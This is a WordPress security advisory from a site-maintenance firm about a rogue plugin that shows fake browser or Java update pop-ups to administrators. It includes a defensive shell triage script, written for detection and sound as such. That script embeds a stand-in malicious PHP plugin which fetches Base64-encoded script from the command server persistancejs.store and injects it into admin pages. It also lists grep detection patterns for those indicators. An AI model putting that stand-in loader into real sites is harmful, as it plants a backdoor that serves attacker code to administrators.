
A new social-engineering campaign is abusing a malicious WordPress plugin to show convincing fake browser or Java update pop-ups — but only to administrators inside wp-admin. The goal is to trick site owners into downloading malware to their own computers, while the plugin quietly maintains access to the website. Here’s what’s happening and how to protect your business.
What’s going on
Attackers are installing a rogue plugin masquerading as a harmless widget (seen as “Modern Recent Posts”). Once active, it fetches remote JavaScript from attacker-controlled servers and injects it into the WordPress dashboard for logged-in admins. The pop-up blocks the screen and pushes an “Update now” download from a malicious domain.
How the attack works (plain English)
- Administrator-only targeting: The plugin checks that you’re in wp-admin, have administrator permissions and are on Windows; only then does it run, so ordinary visitors and most scanners never see it.
- Remote control: It contacts a command server (persistancejs.store), sends basic details (site hostname, admin username), receives a Base64-encoded script and decodes and runs it in your browser session.
- Deceptive pop-up: The injected script displays a full-screen “critical update” for Chrome/Firefox/Java. Clicking “UPDATE NOW” triggers a download from a look-alike domain (e.g. secure-java-update.com).
- Self-update & cleanup: A special URL parameter (?upd=1) lets attackers delete the plugin’s files and pull a fresh copy from the command server, helping the malware persist or change tactics.
Why this matters to your business
- Compromised devices: One click can install a remote-access trojan, ransomware or info-stealer on the administrator’s laptop — jeopardising email, cloud drives and other client sites.
- Ongoing website risk: With a backdoor in place, attackers can add more malware, create rogue users or inject ads — damaging trust, SEO and conversions.
- Cost & disruption: Incident response, lost productivity and reputational harm quickly outweigh the effort of preventative controls.
Warning signs
- Unexpected “Modern Recent Posts” (or other unfamiliar) plugins installed without your knowledge.
- Pop-ups in the WordPress dashboard urging a Chrome/Firefox/Java update.
- Outgoing connections to unknown domains such as persistancejs.store.
- Admin sessions behaving oddly or sudden file changes in plugins/themes.
Quick response (do this now)
- Protect the site with a WAF: Put a web application firewall in front of WordPress to block malicious requests while you investigate.
- Remove the rogue plugin: Copy the suspicious plugin directory off the server first (you will want it for forensics), then delete it over SFTP/SSH and confirm it no longer appears in the dashboard. Re-check the plugins directory afterwards, because the plugin is built to re-fetch its own files.
- Scan thoroughly: Run server-side malware scans to detect injected JavaScript and backdoors. Follow with professional malware removal if needed.
- If anyone clicked “Update”: Treat the administrator’s computer as compromised. Run a full endpoint antivirus/malware scan and change passwords from a clean device.
- Rotate credentials: Change the WordPress, hosting, SFTP/SSH and database passwords; regenerate the WordPress security keys and salts in wp-config.php, which invalidates every existing login session, including the attacker’s; and enforce 2FA for all admins.
- Audit logs & egress: Review admin activity and the web server access log (requests to the plugin path carrying ?upd=1 show when the attacker refreshed the backdoor and from where), and block the command server and download domains at the firewall or DNS layer.
- Update everything: Apply current WordPress core, plugin and theme updates as part of ongoing website maintenance.
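To make the warning signs above and the log review in the quick-response steps concrete, here is an added example; it is not code from this post or from Sucuri’s analysis. It is a small shell script that scores every plugin PHP file against the indicators described above (the command-server domain, Base64 decoding, the administrator-only gate, the upd parameter and remote fetches) and pulls the ?upd=1 self-update requests out of a web-server access log. The WordPress directory layout, the combined log format, both sample plugin files and the sample log lines are all constructed for the example, and the stand-in “rogue” plugin only sketches the described behaviour with placeholder code.

```shell
#!/bin/sh
# Added triage example, not code from the post or from Sucuri's analysis.
# It creates a throwaway WordPress-like tree with constructed sample files,
# then runs the two checks a practitioner would run on a real site.
set -u

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT
PLUGINS="$WORK/wp-content/plugins"       # assumed layout of a WordPress install
ACCESS_LOG="$WORK/access.log"            # assumed: Apache/nginx combined log format
mkdir -p "$PLUGINS/modern-recent-posts" "$PLUGINS/akismet"

# Constructed stand-in for the rogue plugin. It only sketches the behaviours
# the post describes (admin-only gate, Windows check, fetch from the C2
# domain, Base64 payload, ?upd=1 self-update); it is not the real malware.
cat > "$PLUGINS/modern-recent-posts/modern-recent-posts.php" <<'EOF'
<?php
/* Plugin Name: Modern Recent Posts */
add_action('admin_enqueue_scripts', function () {
    if (!is_admin() || !current_user_can('administrator')) { return; }
    if (stripos($_SERVER['HTTP_USER_AGENT'], 'Windows') === false) { return; }
    $resp = wp_remote_get('https://persistancejs.store/load?h=' . rawurlencode(home_url()));
    echo '<script>' . base64_decode(wp_remote_retrieve_body($resp)) . '</script>';
});
if (isset($_GET['upd']) && $_GET['upd'] === '1') { /* wipe files, re-fetch self */ }
EOF

# Constructed benign plugin for contrast.
cat > "$PLUGINS/akismet/akismet.php" <<'EOF'
<?php
/* Plugin Name: Akismet */
add_action('init', function () { return true; });
EOF

# Constructed access-log lines (RFC 5737 documentation addresses).
cat > "$ACCESS_LOG" <<'EOF'
203.0.113.7 - - [01/Oct/2025:10:00:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Oct/2025:10:02:13 +0000] "GET /wp-content/plugins/modern-recent-posts/modern-recent-posts.php?upd=1 HTTP/1.1" 200 12 "-" "curl/8.0"
203.0.113.7 - - [01/Oct/2025:10:03:44 +0000] "GET /?p=1 HTTP/1.1" 200 8100 "-" "Mozilla/5.0"
EOF

# Check 1: score every plugin PHP file against the indicators from the post.
# Any single indicator is normal in some legitimate plugin (base64_decode and
# wp_remote_get especially), so only files hitting two or more are reported.
scan_plugins() {
    find "$1" -name '*.php' | while read -r f; do
        score=0
        grep -q  'persistancejs\.store'                 "$f" && score=$((score + 1))
        grep -q  'base64_decode'                        "$f" && score=$((score + 1))
        grep -qE 'current_user_can\(.administrator.\)'  "$f" && score=$((score + 1))
        grep -qE '\$_GET\[.upd.\]'                      "$f" && score=$((score + 1))
        grep -qE 'wp_remote_(get|retrieve_body)'        "$f" && score=$((score + 1))
        [ "$score" -ge 2 ] && echo "$score $f"
    done | sort -rn
}

# Check 2: requests that hit a plugin file with upd=1 are attacker-triggered
# self-updates; they give the timestamps and source IPs for the incident record.
find_update_triggers() {
    grep -E '"(GET|POST) /wp-content/plugins/[^ ]*\?([^ ]*&)?upd=1' "$1" || true
}

echo "== plugin files matching 2+ indicators (score path) =="
scan_plugins "$PLUGINS"
echo "== self-update triggers in access log =="
find_update_triggers "$ACCESS_LOG"
```

Point the two functions at a real wp-content/plugins directory and access log instead of the constructed ones. A score of two or more is a cue to open the file, not proof of infection, and the real plugin’s code may not look like the stand-in; read any hit by hand, keep a copy, and only then delete it.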
Prevention and ongoing protection
- Least-privilege access: Minimise the number of administrators; enforce strong, unique passwords and 2FA.
- Security monitoring: Enable file-integrity alerts and behavioural security monitoring to spot new plugins, file changes and unusual admin activity.
- WAF in front of WordPress: A reputable WAF adds virtual patching and helps stop malicious uploads and call-outs — strengthening your malware protection.
- Backups & recovery: Maintain regular, off-site backups for rapid restoration after malware removal.
- Plugin hygiene: Use reputable sources only; remove anything unused.
How matm can help
- Managed WordPress, plugin & theme updates
- Security monitoring and WAF setup
- Regular backups & fast site recovery
- Malware removal and emergency response
Need calm, practical support to remove infections and strengthen your WordPress security? Email [email protected] or call 01952 883 526.
Based on research by Sucuri — read the original analysis.